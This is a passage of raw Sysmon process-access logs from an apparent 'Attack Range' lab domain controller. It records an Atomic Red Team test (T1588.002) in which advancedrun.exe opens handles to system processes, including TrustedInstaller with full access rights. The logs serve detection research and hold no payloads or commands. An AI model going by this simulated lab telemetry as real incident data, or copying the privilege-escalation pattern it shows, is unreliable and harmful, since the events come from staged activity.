e+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.366{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
